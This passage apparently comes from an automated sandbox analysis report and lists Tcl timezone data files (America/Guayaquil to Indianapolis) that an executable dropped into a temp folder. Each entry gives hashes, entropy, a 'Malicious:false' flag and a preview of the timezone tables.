                                                                                                                                                                                                                                                    SHA-512:540DE179EE5D716537C3E7C184CD098A281D59D285A4E5E7733AC28A0F17F644E7F192EFD76DE5D7EEB80D91754D8B2579DCDDC49296AF433CEA10A5EE405F5F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Guayaquil) {. {-9223372036854775808 -19160 0 LMT}. {-2524502440 -18840 0 QMT}. {-1230749160 -18000 0 ECT}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Guyana

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):237
                                                                                                                                                                                                                                                    Entropy (8bit):4.722702793311002
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9X52905R3Lm2OHRjGeTShVy4YiwNUSY6KcVVFLIB/z:MBp5290LLmdHVTiy45NSOc/VG/z
                                                                                                                                                                                                                                                    MD5:8D1F3433552E24E8C97DDE88DFCC070F
                                                                                                                                                                                                                                                    SHA1:992FBE19E858ADDBF228D1FFCF3E2A8ED860CEE0
                                                                                                                                                                                                                                                    SHA-256:619CE2809A31BF685A74F0D54E9433A5557796C73B9337CAB7CC19980352DBAF
                                                                                                                                                                                                                                                    SHA-512:89A80E8744117131854BD65F21F5FDF4BA22C215DD99C0DAD5144F0D01D3C19160085E28293682EF8FEDA8AE244FDA8BA3E3199D233D9B7EAAD4EC6D8A73BBAE
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Guyana) {. {-9223372036854775808 -13960 0 LMT}. {-1730578040 -13500 0 GBGT}. {-113688900 -13500 0 GYT}. {176010300 -10800 0 GYT}. {662698800 -14400 0 GYT}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Halifax

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):10763
                                                                                                                                                                                                                                                    Entropy (8bit):3.724988391778253
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:Y7Z1hubfVmv0SqJXDiFHrbm96qddObEn/RDzWRfQFQ4XL8vG+81VcfnrpbXXnqvo:823ZLYvuOZJv
                                                                                                                                                                                                                                                    MD5:7DE8E355A725B3D9B3FD06A838B9715F
                                                                                                                                                                                                                                                    SHA1:41C6AAEA03FC7FEED50CFFFC4DFF7F35E2B1C23D
                                                                                                                                                                                                                                                    SHA-256:5F65F38FFA6B05C59B21DB98672EB2124E4283530ACB01B22093EAEFB256D116
                                                                                                                                                                                                                                                    SHA-512:4C61A15DDF28124343C1E6EFE068D15E48F0662534486EC38A4E2731BE085CDA5856F884521EF32A6E0EDD610A8A491A722220BDD1BAF2A9652D8457778AF696
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Halifax) {. {-9223372036854775808 -15264 0 LMT}. {-2131645536 -14400 0 AST}. {-1696276800 -10800 1 ADT}. {-1680469200 -14400 0 AST}. {-1640980800 -14400 0 AST}. {-1632074400 -10800 1 ADT}. {-1615143600 -14400 0 AST}. {-1609444800 -14400 0 AST}. {-1566763200 -10800 1 ADT}. {-1557090000 -14400 0 AST}. {-1535486400 -10800 1 ADT}. {-1524949200 -14400 0 AST}. {-1504468800 -10800 1 ADT}. {-1493413200 -14400 0 AST}. {-1472414400 -10800 1 ADT}. {-1461963600 -14400 0 AST}. {-1440964800 -10800 1 ADT}. {-1429390800 -14400 0 AST}. {-1409515200 -10800 1 ADT}. {-1396731600 -14400 0 AST}. {-1376856000 -10800 1 ADT}. {-1366491600 -14400 0 AST}. {-1346616000 -10800 1 ADT}. {-1333832400 -14400 0 AST}. {-1313956800 -10800 1 ADT}. {-1303678800 -14400 0 AST}. {-1282507200 -10800 1 ADT}. {-1272661200 -14400 0 AST}. {-1251057600 -10800 1 ADT}. {-1240088400

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Havana

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8444
                                                                                                                                                                                                                                                    Entropy (8bit):3.7372403334059547
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:VXA0Bc0tTJtNliQ4sxgpuG4c2JPTxUw9Or2ocrPGSyM9Gk4LK46MCf7VkXgySCWv:VXA0Bc0tTJtNliQ4sxSuG4c2JPTxUw9F
                                                                                                                                                                                                                                                    MD5:C436FDCDBA98987601FEFC2DBFD5947B
                                                                                                                                                                                                                                                    SHA1:A04CF2A5C9468C634AED324CB79F9EE3544514B7
                                                                                                                                                                                                                                                    SHA-256:32F8B4D03E4ACB466353D72DAA2AA9E1E42D454DBBA001D0B880667E6346B8A1
                                                                                                                                                                                                                                                    SHA-512:56C25003685582AF2B8BA4E32EFF03EF10F4360D1A12E0F1294355000161ADDF7024CBD047D1830AB884BE2C385FD8ABE8DA5C30E9A0671C22E84EE3BF957D85
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Havana) {. {-9223372036854775808 -19768 0 LMT}. {-2524501832 -19776 0 HMT}. {-1402813824 -18000 0 CST}. {-1311534000 -14400 1 CDT}. {-1300996800 -18000 0 CST}. {-933534000 -14400 1 CDT}. {-925675200 -18000 0 CST}. {-902084400 -14400 1 CDT}. {-893620800 -18000 0 CST}. {-870030000 -14400 1 CDT}. {-862171200 -18000 0 CST}. {-775681200 -14400 1 CDT}. {-767822400 -18000 0 CST}. {-744231600 -14400 1 CDT}. {-736372800 -18000 0 CST}. {-144702000 -14400 1 CDT}. {-134251200 -18000 0 CST}. {-113425200 -14400 1 CDT}. {-102542400 -18000 0 CST}. {-86295600 -14400 1 CDT}. {-72907200 -18000 0 CST}. {-54154800 -14400 1 CDT}. {-41457600 -18000 0 CST}. {-21495600 -14400 1 CDT}. {-5774400 -18000 0 CST}. {9954000 -14400 1 CDT}. {25675200 -18000 0 CST}. {41403600 -14400 1 CDT}. {57729600 -18000 0 CST}. {73458000 -14400 1 CDT}. {87364800 -18000 0 CST}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Hermosillo

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):595
                                                                                                                                                                                                                                                    Entropy (8bit):4.2803367804689785
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:MBp5290ebmdH5NWw+Ux++vTQtFlvm0tFXtFjV5a:cQBe5gfUT7UFltF9FjV5a
                                                                                                                                                                                                                                                    MD5:9D1A1746614CE2CEE26D066182938CDC
                                                                                                                                                                                                                                                    SHA1:967590403A84E80ED299B8D548A2B37C8EEB21CE
                                                                                                                                                                                                                                                    SHA-256:493DB3E7B56B2E6B266A5C212CD1F75F1E5CF57533DA03BB1C1F2449543B9F48
                                                                                                                                                                                                                                                    SHA-512:DFAE6BC48F2E4B75DD6744AEE57D31D6A6E764D02DCA5731C7B516AD87B9BAB2FEB355A012EC38BDD53008B501B0744953EB7E0677F02B9EAF083D2E66042B37
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Hermosillo) {. {-9223372036854775808 -26632 0 LMT}. {-1514739600 -25200 0 MST}. {-1343066400 -21600 0 CST}. {-1234807200 -25200 0 MST}. {-1220292000 -21600 0 CST}. {-1207159200 -25200 0 MST}. {-1191344400 -21600 0 CST}. {-873828000 -25200 0 MST}. {-661539600 -28800 0 PST}. {28800 -25200 0 MST}. {828867600 -21600 1 MDT}. {846403200 -25200 0 MST}. {860317200 -21600 1 MDT}. {877852800 -25200 0 MST}. {891766800 -21600 1 MDT}. {909302400 -25200 0 MST}. {915174000 -25200 0 MST}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Indiana\Indianapolis

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6996
                                                                                                                                                                                                                                                    Entropy (8bit):3.799188069575817
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:uRXxWMzJ2eQzURWu3N7sHRwvOTFhP5S+ijFnRaJeaX1eyDt:uRXxWUJ2eQzURWu3NOqvOTFhPI1jFIL
                                                                                                                                                                                                                                                    MD5:154A332C3ACF6D6F358B07D96B91EBD1
                                                                                                                                                                                                                                                    SHA1:FC16E7CBE179B3AB4E0C2A61AB5E0E8C23E50D50
                                                                                                                                                                                                                                                    SHA-256:C0C7964EBF9EA332B46D8B928B52FDE2ED15ED2B25EC664ACD33DA7BF3F987AE
                                                                                                                                                                                                                                                    SHA-512:5831905E1E6C6FA9DD309104B3A2EE476941D6FF159764123A477E2690C697B0F19EDEA0AD0CD3BBBECF96D64DC4B981027439E7865FCB1632661C8539B3BD6C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Indiana/Indianapolis) {. {-9223372036854775808 -20678 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-1577901600 -21600 0 CST}. {-900259200 -18000 1 CDT}. {-891795600 -21600 0 CST}. {-883591200 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-757360800 -21600 0 CST}. {-747244800 -18000 1 CDT}. {-733942800 -21600 0 CST}. {-715795200 -18000 1 CDT}. {-702493200 -21600 0 CST}. {-684345600 -18000 1 CDT}. {-671043600 -21600 0 CST}. {-652896000 -18000 1 CDT}. {-639594000 -21600 0 CST}. {-620841600 -18000 1 CDT}. {-608144400 -21600 0 CST}. {-589392000 -18000 1 CDT}. {-576090000 -21600 0 CST}. {-557942400 -18000 1 CDT}. {-544640400 -21600 0 CST}. {-526492800 -18000 1 CDT}. {-513190800 -21600 0

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Indiana\Knox

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8470
                                                                                                                                                                                                                                                    Entropy (8bit):3.7546412701514034
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:AXxr2eQzURWu3Oab9BxXI6X8xYIIOdXkqbfkeTzZSJw5/9/yuvQ+hcr8bYkzbXw6:AXxr2eQzUwu3Oab9BxXI6XUYIIOdXkqv
                                                                                                                                                                                                                                                    MD5:E8AFD9E320A7F4310B413F8086462F31
                                                                                                                                                                                                                                                    SHA1:7BEE624AAC096E9C280B4FC84B0671381C657F6C
                                                                                                                                                                                                                                                    SHA-256:BE74C1765317898834A18617352DF3B2952D69DE4E294616F1554AB95824DAF0
                                                                                                                                                                                                                                                    SHA-512:C76620999A293FA3A93CA4615AB78F19395F12CC08C242F56BFD4C4CAF8BC769DDEBF33FF10F7DA5A3EFD8ED18792362780188636075419014A8C099A897C43C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Indiana/Knox) {. {-9223372036854775808 -20790 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-725824800 -21600 0 CST}. {-715795200 -18000 1 CDT}. {-702493200 -21600 0 CST}. {-684345600 -18000 1 CDT}. {-671043600 -21600 0 CST}. {-652896000 -18000 1 CDT}. {-639594000 -21600 0 CST}. {-620841600 -18000 1 CDT}. {-608144400 -21600 0 CST}. {-589392000 -18000 1 CDT}. {-576090000 -21600 0 CST}. {-557942400 -18000 1 CDT}. {-544640400 -21600 0 CST}. {-526492800 -18000 1 CDT}. {-513190800 -21600 0 CST}. {-495043200 -18000 1 CDT}. {-481741200 -21600 0 CST}. {-463593600 -18000 1 CDT}. {-447267600 -21600 0 CST}. {-431539200 -18000 1 CDT}. {-415818000 -21600 0 CST}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Indiana\Marengo

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7037
                                                                                                                                                                                                                                                    Entropy (8bit):3.786429098558221
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:FXx3knO559B18XWRh0ksHRwvOTFhP5S+ijFnRaJeaX1eyDt:FXxUnO559B2XWRh0pqvOTFhPI1jFIL
                                                                                                                                                                                                                                                    MD5:456422A0D5BE8FBF5DBD0E75D8650894
                                                                                                                                                                                                                                                    SHA1:737AC21F019A7E89689B9C8B465C8482FF4F403E
                                                                                                                                                                                                                                                    SHA-256:C92D86CACFF85344453E1AFBC124CE11085DE7F6DC52CB4CBE6B89B01D5FE2F3
                                                                                                                                                                                                                                                    SHA-512:372AEBB2F13A50536C36A025881874E5EE3162F0168B71B2083965BECBBFCA3DAC726117D205D708CC2B4F7ABE65CCC2B3FE6625F1403D97001950524D545470
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Indiana/Marengo) {. {-9223372036854775808 -20723 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-599594400 -21600 0 CST}. {-589392000 -18000 1 CDT}. {-576090000 -21600 0 CST}. {-495043200 -18000 1 CDT}. {-481741200 -21600 0 CST}. {-463593600 -18000 1 CDT}. {-450291600 -21600 0 CST}. {-431539200 -18000 1 CDT}. {-418237200 -21600 0 CST}. {-400089600 -18000 1 CDT}. {-386787600 -21600 0 CST}. {-368640000 -18000 1 CDT}. {-355338000 -21600 0 CST}. {-337190400 -18000 1 CDT}. {-323888400 -21600 0 CST}. {-305740800 -18000 1 CDT}. {-292438800 -21600 0 CST}. {-273686400 -18000 0 EST}. {-31518000 -18000 0 EST}. {-21488400 -14400 1 EDT}. {-5767200 -18000 0 EST}. {

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Indiana\Petersburg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7364
                                                                                                                                                                                                                                                    Entropy (8bit):3.79636789874872
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:pXxS559B2XW6X8x3X3D2D8IOdXkqbfkeTzlbaqvOTFhPI1jFIL:pXxS559B2XW6XU3X3D2D8IOdXkqbfNT2
                                                                                                                                                                                                                                                    MD5:9614153F9471187A2F92B674733369A0
                                                                                                                                                                                                                                                    SHA1:199E8D5018A374EDB9592483CE4DDB30712006E3
                                                                                                                                                                                                                                                    SHA-256:5323EBC8D450CC1B53AED18AD209ADEB3A6EEB5A00A80D63E26DB1C85B6476ED
                                                                                                                                                                                                                                                    SHA-512:2A1E26D711F62C51A5EE7014584FAF41C1780BD62573247D45D467500C6AB9A9EAD5A382A1986A9D768D7BB927E4D391EA1B7A4AD9A54D3B05D8AD2385156C33
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Indiana/Petersburg) {. {-9223372036854775808 -20947 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-473364000 -21600 0 CST}. {-462996000 -18000 1 CDT}. {-450291600 -21600 0 CST}. {-431539200 -18000 1 CDT}. {-418237200 -21600 0 CST}. {-400089600 -18000 1 CDT}. {-386787600 -21600 0 CST}. {-368640000 -18000 1 CDT}. {-355338000 -21600 0 CST}. {-337190400 -18000 1 CDT}. {-323888400 -21600 0 CST}. {-305740800 -18000 1 CDT}. {-292438800 -21600 0 CST}. {-273686400 -18000 1 CDT}. {-257965200 -21600 0 CST}. {-242236800 -18000 1 CDT}. {-226515600 -21600 0 CST}. {-210787200 -18000 1 CDT}. {-195066000 -21600 0 CST}. {-179337600 -18000 1 CDT}. {-163616400 -21600 0 CST

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Indiana\Tell_City

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6992
                                                                                                                                                                                                                                                    Entropy (8bit):3.7768650637181533
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:CXxjL36559B2XI6XE3X3D2E0bYkzbXwDTIRqfhXbdXvDXpVXVto//q7u379zlq3g:CXxjL36559B2XI6XE3X3D2E0bYkzbXw6
                                                                                                                                                                                                                                                    MD5:D0F40504B578D996E93DAE6DA583116A
                                                                                                                                                                                                                                                    SHA1:4D4D24021B826BFED2735D42A46EEC1C9EBEA8E3
                                                                                                                                                                                                                                                    SHA-256:F4A0572288D2073D093A256984A2EFEC6DF585642EA1C4A2860B38341D376BD8
                                                                                                                                                                                                                                                    SHA-512:BA9D994147318FF5A53D45EC432E118B5F349207D58448D568E0DB316452EF9FD620EE4623FD4EAD123BC2A6724E1BAE2809919C58223E6FD4C7A20F004155E0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Indiana/Tell_City) {. {-9223372036854775808 -20823 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-757360800 -21600 0 CST}. {-747244800 -18000 1 CDT}. {-733942800 -21600 0 CST}. {-526492800 -18000 1 CDT}. {-513190800 -21600 0 CST}. {-495043200 -18000 1 CDT}. {-481741200 -21600 0 CST}. {-462996000 -18000 1 CDT}. {-450291600 -21600 0 CST}. {-431539200 -18000 1 CDT}. {-418237200 -21600 0 CST}. {-400089600 -18000 1 CDT}. {-386787600 -21600 0 CST}. {-368640000 -18000 1 CDT}. {-355338000 -21600 0 CST}. {-337190400 -18000 1 CDT}. {-323888400 -21600 0 CST}. {-305740800 -18000 1 CDT}. {-289414800 -21600 0 CST}. {-273686400 -18000 1 CDT}. {-260989200 -21600 0 CST}

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Indiana\Vevay

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6350
                                                                                                                                                                                                                                                    Entropy (8bit):3.782861360101505
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:K9Xx3+lsHRwvOTFhP5S+ijFnRaJeaX1eyDt:6XxuoqvOTFhPI1jFIL
                                                                                                                                                                                                                                                    MD5:35A64C161E0083DCE8CD1E8E1D6EBE85
                                                                                                                                                                                                                                                    SHA1:9BC295C23783C07587D82DA2CC25C1A4586284B2
                                                                                                                                                                                                                                                    SHA-256:75E89796C6FB41D75D4DDA6D94E4D27979B0572487582DC980575AF6656A7822
                                                                                                                                                                                                                                                    SHA-512:7BAF735DA0DE899653F60EED6EEF53DD8A1ABC6F61F052B8E37B404BC9B37355E94563827BC296D8E980C4247864A57A117B7B1CB58A2C242991BBDC8FE7174E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Indiana/Vevay) {. {-9223372036854775808 -20416 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-495043200 -18000 0 EST}. {-31518000 -18000 0 EST}. {-21488400 -14400 1 EDT}. {-5767200 -18000 0 EST}. {9961200 -14400 1 EDT}. {25682400 -18000 0 EST}. {41410800 -14400 1 EDT}. {57736800 -18000 0 EST}. {73465200 -14400 1 EDT}. {89186400 -18000 0 EST}. {94712400 -18000 0 EST}. {1136091600 -18000 0 EST}. {1143961200 -14400 1 EDT}. {1162101600 -18000 0 EST}. {1173596400 -14400 1 EDT}. {1194156000 -18000 0 EST}. {1205046000 -14400 1 EDT}. {1225605600 -18000 0 EST}. {1236495600 -14400 1 EDT}. {1257055200 -18000 0 EST}. {1268550000 -14400 1 EDT}. {1289109600 -18000

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Indiana\Vincennes

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6992
                                                                                                                                                                                                                                                    Entropy (8bit):3.795913753683276
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:TXxjL36559B2XI6XE3X3D2E0baqvOTFhPI1jFIL:TXxjL36559B2XI6XE3X3D2E0bZ3+
                                                                                                                                                                                                                                                    MD5:AD8B44BD0DBBEB06786B2B281736A82B
                                                                                                                                                                                                                                                    SHA1:7480D3916F0ED66379FC534F20DC31001A3F14AF
                                                                                                                                                                                                                                                    SHA-256:18F35F24AEF9A937CD9E91E723F611BC5D802567A03C5484FAB7AEEC1F2A0ED0
                                                                                                                                                                                                                                                    SHA-512:7911EC3F1FD564C50DEAF074ED99A502A9B5262B63E3E0D2901E21F27E90FBD5656A53831E61B43A096BA1FF18BB4183CCCE2B903782C2189DAAFDD7A90B3083
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Indiana/Vincennes) {. {-9223372036854775808 -21007 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-757360800 -21600 0 CST}. {-747244800 -18000 1 CDT}. {-733942800 -21600 0 CST}. {-526492800 -18000 1 CDT}. {-513190800 -21600 0 CST}. {-495043200 -18000 1 CDT}. {-481741200 -21600 0 CST}. {-462996000 -18000 1 CDT}. {-450291600 -21600 0 CST}. {-431539200 -18000 1 CDT}. {-418237200 -21600 0 CST}. {-400089600 -18000 1 CDT}. {-386787600 -21600 0 CST}. {-368640000 -18000 1 CDT}. {-355338000 -21600 0 CST}. {-337190400 -18000 1 CDT}. {-323888400 -21600 0 CST}. {-305740800 -18000 1 CDT}. {-289414800 -21600 0 CST}. {-273686400 -18000 1 CDT}. {-260989200 -21600 0 CST}

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Indiana\Winamac

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7170
                                                                                                                                                                                                                                                    Entropy (8bit):3.7942292979267767
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:YXxjJ2eQzURWu3Oab9B2XWR0/qvOTFhPI1jFIL:YXxjJ2eQzUwu3Oab9B2XWR0M3+
                                                                                                                                                                                                                                                    MD5:40D8E05D8794C9D11DF018E3C8B8D7C0
                                                                                                                                                                                                                                                    SHA1:58161F320CB46EC72B9AA6BAD9086F18B2E0141B
                                                                                                                                                                                                                                                    SHA-256:A13D6158CCD4283FE94389FD341853AD90EA4EC505D37CE23BD7A6E7740F03F6
                                                                                                                                                                                                                                                    SHA-512:BC45B6EFF1B879B01F517D4A4012D0AFBA0F6A9D92E862EF9A960FE07CBE216C8C929FE790044C566DC95981EC4BEAB3DCBD45A1FE597606CF601214A78AEA08
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Indiana/Winamac) {. {-9223372036854775808 -20785 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-757360800 -21600 0 CST}. {-747244800 -18000 1 CDT}. {-733942800 -21600 0 CST}. {-715795200 -18000 1 CDT}. {-702493200 -21600 0 CST}. {-684345600 -18000 1 CDT}. {-671043600 -21600 0 CST}. {-652896000 -18000 1 CDT}. {-639594000 -21600 0 CST}. {-620841600 -18000 1 CDT}. {-608144400 -21600 0 CST}. {-589392000 -18000 1 CDT}. {-576090000 -21600 0 CST}. {-557942400 -18000 1 CDT}. {-544640400 -21600 0 CST}. {-526492800 -18000 1 CDT}. {-513190800 -21600 0 CST}. {-495043200 -18000 1 CDT}. {-481741200 -21600 0 CST}. {-463593600 -18000 1 CDT}. {-447267600 -21600 0 CST}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\America\Indianapolis

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):228
                                                                                                                                                                                                                                                    Entropy (8bit):4.655121947675421
                                                                                                                                                                                                                                                    Encrypted:false
